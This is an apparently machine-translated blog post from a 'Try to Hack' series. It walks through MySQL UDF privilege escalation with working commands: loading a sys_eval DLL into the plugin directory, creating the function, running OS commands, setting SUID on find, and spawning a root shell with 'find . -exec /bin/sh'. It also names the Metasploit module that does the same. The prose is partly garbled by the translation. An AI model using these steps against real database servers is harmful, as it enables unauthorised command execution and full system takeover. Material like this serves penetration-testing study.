[try to hack] UDF raises rights

Blog home page ： Happy star The blog home page of
Series column ：Try to Hack
Welcome to focus on the likes collection ️ Leaving a message.
Starting time ：2022 year 7 month 11 Japan
The author's level is very limited , If an error is found , Please let me know , thank ！

A lot of content comes from This article and This article

@toc

UDF sketch

UDF（Userdefined function） Can be translated into user-defined functions , It as a mysql An extended interface for , It can be for mysql Add some functions . such as mysql Some functions do not , I use it. UDF Add some functions , Then I can be in mysql This function is used in .

Premise ;
know mysql User name and password , And you can log in remotely
mysql Have permission to write to file , namely secure_file_priv The value of is empty .

mysql Whether there is permission to write to the file

secure_file_priv It's to limit load dumpfile、into outfile、load_file() Which directory is the function in 1） When secure_file_priv The value of is NULL , Said restrictions mysqld Not allowed to import | export , There is no way to raise the right at this time
2） When secure_file_priv The value of is /tmp/ , Said restrictions mysqld Import of | Exports can only occur in /tmp/ Under the table of contents , Right cannot be raised at this time
3） When secure_file_priv Where there is no specific value , Said is wrong mysqld Import of | Export to limit , Right can be raised at this time !

show global variables like '%secure%';

Upload UDF Dynamic link library file

Dynamic link library is a way to realize the concept of shared function library ,== stay windows In the environment, the suffix is .dll, stay linux In the environment, the suffix is .so== . We will put this file in a specific directory , This file contains some functions that execute system commands

1.Mysql The version is greater than 5.1,udf.dll Documents must be placed in MySQL The installation directory \lib\plugin Under the folder .（plugin The folder does not exist by default , Need to create ）.

2.Mysql Version less than 5.1：
If it is win 2000 Server for , We need to udf.dll Import file to C:\Windows\udf.dll Next .
If it is win2003 The server , We will udf.dll The file is exported in C:\Windows\udf.dll Next .

select version(); see mysql edition
select @@basedir; get mysql The installation directory

show variables like 'plugin%'; // Just use this command

Get the current database and operating system architecture ( Different operating systems 、 Operating system bits , Different dynamic link libraries are needed )
select @@version_compile_os, @@version_compile_machine;

Dynamic link library acquisition （sqlmap and msf There are ）：

msf stay /usr/share/metasploit-framework/data/exploits/mysql/

take dll The file is written to plugin in

select hex(load_file('D:\\lib_mysqludf_sys64.dll')) into dumpfile 'E:\\mysql-5.7.24-winx64\\lib\\plugin\\udf.dll';# here windows The next directory structure needs to be escaped and double written 

Create a custom function

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

View the created sys_eval function

select * from mysql.func where name = 'sys_eval';    

Use system commands

select sys_eval('whoami');   select sys_eval('chmod u+s /usr/bin/find');     // to find Give orders to suid jurisdiction  

Reuse suid Just ask for the right
find . -exec /bin/sh \;

Use MSF Medium exploit/multi/mysql/mysql_udf_payload Modules can also do UDF Raise the right . see This article